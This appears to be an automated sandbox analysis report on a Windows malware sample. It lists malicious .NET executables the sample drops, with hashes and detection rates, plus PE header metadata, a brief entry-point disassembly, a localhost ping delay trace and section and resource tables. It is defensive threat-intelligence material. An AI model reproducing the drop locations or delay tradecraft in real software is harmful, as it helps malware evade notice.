                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):38400
                                                                                                                                                                        Entropy (8bit):5.699005826018714
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                                                                        MD5:87765D141228784AE91334BAE25AD743
                                                                                                                                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):34304
                                                                                                                                                                        Entropy (8bit):5.618776214605176
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):46592
                                                                                                                                                                        Entropy (8bit):5.870612048031897
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):70144
                                                                                                                                                                        Entropy (8bit):5.909536568846014
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):38400
                                                                                                                                                                        Entropy (8bit):5.699005826018714
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                                                                        MD5:87765D141228784AE91334BAE25AD743
                                                                                                                                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):33792
                                                                                                                                                                        Entropy (8bit):5.541771649974822
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):89600
                                                                                                                                                                        Entropy (8bit):5.905167202474779
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                                                                        MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                                                                        SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                                                                        SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                                                                        SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):39936
                                                                                                                                                                        Entropy (8bit):5.629584586954759
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):342528
                                                                                                                                                                        Entropy (8bit):6.170134230759619
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):50176
                                                                                                                                                                        Entropy (8bit):5.723168999026349
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2615296
                                                                                                                                                                        Entropy (8bit):4.63674531088187
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:KTcFTujpEPnECw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtINz6t1:4cFcWPnyMcQmQmqycMxFNyN
                                                                                                                                                                        MD5:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        SHA1:87D030319ECAB583FB3B68F152C10D780A4BA757
                                                                                                                                                                        SHA-256:EE08091F6FBCA8BFF62F6C75CE5BB74CF86BDF8ACF80D2497C399F01FCBDE59D
                                                                                                                                                                        SHA-512:009B86BD2684B3CEE328F3A0869ABCF3D16F4812E5D74D1A11664A490A22C51C5C5DEAF9561CCD50618111C57173435A7ADBBE6EADFE6AFFEEA50D63C1AD3227
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (933), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):933
                                                                                                                                                                        Entropy (8bit):5.907591468925435
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:0v34R7fEpLG1wTJxmnKaYPgqxkXKOqMeSlV5+Tj6hjfj:83+j1w1eKwqiXzqMzleCRj
                                                                                                                                                                        MD5:A1E47197F062B6FBA935F0F97A11DA0B
                                                                                                                                                                        SHA1:72F0CC71135657C3FB135DA03A14E2DA08DE4FAE
                                                                                                                                                                        SHA-256:5E093F309193E6729AC8C503F2521235E9AA73DAC160D0B8D89DB9CD1F8E444F
                                                                                                                                                                        SHA-512:6D19EB6AB6688263BBEC575072C2605D759E892A4B53F97CEC3AE70FF2AA75C86E41644A6BC73AC6B527DC71D010AAD588A3A4726314ECCAA3516F4928AA896E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\System32\PING.EXE
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):502
                                                                                                                                                                        Entropy (8bit):4.606362154056947
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:POJa95pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:WJ6dUOAokItULVDv
                                                                                                                                                                        MD5:479265214B7D40F1F133ADCA59674F38
                                                                                                                                                                        SHA1:5CE8DE4410682925D3BB0CDBBB4A03405DEAE389
                                                                                                                                                                        SHA-256:524C3EB619E3D256AE2A24827D731AE5943268FC14FFE6D619E2E84C3119C941
                                                                                                                                                                        SHA-512:44D56680467E77DF23F04F7134ED52898347930E4A6F2D52287C24C8799BC91A93F10BD0FEC9A09D27FD607303FD0397A1F78486DACC92637C0FF167AD7ED34C
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..Pinging 123716 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Entropy (8bit):5.011674550380006
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:updIMdPUj8.exe
                                                                                                                                                                        File size:2'937'141 bytes
                                                                                                                                                                        MD5:bc1fb66921db74a0051917b26a4bd316
                                                                                                                                                                        SHA1:fe3667e5c6a3056dac5bae9f2d718466a0b246bc
                                                                                                                                                                        SHA256:b87707b4ec5d92bfb2e13e04201fe95df291612511a4023001d0ec7fcbf88cb3
                                                                                                                                                                        SHA512:db0fce0938ee67375b20b58a40930d1d29e7fe0a021a42327ed45b05ca3e6f4ef18344588193ebfca1779353d9d2123a0bb52333b11959315a9c0cdc926461dd
                                                                                                                                                                        SSDEEP:24576:2TbBv5rUyXVgTcFTujpEPnECw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFK:IBJ2cFcWPnyMcQmQmqycMxFNyNl
                                                                                                                                                                        TLSH:95D5A0203DEB502AF173EFB54AE4759ADA6FB6B33B07589E205003864713A81DDD163E
                                                                                                                                                                        Icon Hash:1515d4d4442f2d2d
                                                                                                                                                                        Entrypoint:0x41f530
                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                        Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                        File Version Major:5
                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                        Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                                                                                                        Instruction
                                                                                                                                                                        call 00007FD85CC0636Bh
                                                                                                                                                                        jmp 00007FD85CC05C7Dh
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        push esi
                                                                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                                                                        mov esi, ecx
                                                                                                                                                                        call 00007FD85CBF8AC7h
                                                                                                                                                                        mov dword ptr [esi], 004356D0h
                                                                                                                                                                        mov eax, esi
                                                                                                                                                                        pop esi
                                                                                                                                                                        pop ebp
                                                                                                                                                                        retn 0004h
                                                                                                                                                                        and dword ptr [ecx+04h], 00000000h
                                                                                                                                                                        mov eax, ecx
                                                                                                                                                                        and dword ptr [ecx+08h], 00000000h
                                                                                                                                                                        mov dword ptr [ecx+04h], 004356D8h
                                                                                                                                                                        mov dword ptr [ecx], 004356D0h
                                                                                                                                                                        ret
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        push esi
                                                                                                                                                                        mov esi, ecx
                                                                                                                                                                        lea eax, dword ptr [esi+04h]
                                                                                                                                                                        mov dword ptr [esi], 004356B8h
                                                                                                                                                                        push eax
                                                                                                                                                                        call 00007FD85CC0910Fh
                                                                                                                                                                        test byte ptr [ebp+08h], 00000001h
                                                                                                                                                                        pop ecx
                                                                                                                                                                        je 00007FD85CC05E0Ch
                                                                                                                                                                        push 0000000Ch
                                                                                                                                                                        push esi
                                                                                                                                                                        call 00007FD85CC053C9h
                                                                                                                                                                        pop ecx
                                                                                                                                                                        pop ecx
                                                                                                                                                                        mov eax, esi
                                                                                                                                                                        pop esi
                                                                                                                                                                        pop ebp
                                                                                                                                                                        retn 0004h
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        sub esp, 0Ch
                                                                                                                                                                        lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                        call 00007FD85CBF8A42h
                                                                                                                                                                        push 0043BEF0h
                                                                                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                        push eax
                                                                                                                                                                        call 00007FD85CC08BC9h
                                                                                                                                                                        int3
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        sub esp, 0Ch
                                                                                                                                                                        lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                        call 00007FD85CC05D88h
                                                                                                                                                                        push 0043C0F4h
                                                                                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                        push eax
                                                                                                                                                                        call 00007FD85CC08BACh
                                                                                                                                                                        int3
                                                                                                                                                                        jmp 00007FD85CC0A647h
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        push 00422900h
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        Programming Language:
                                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
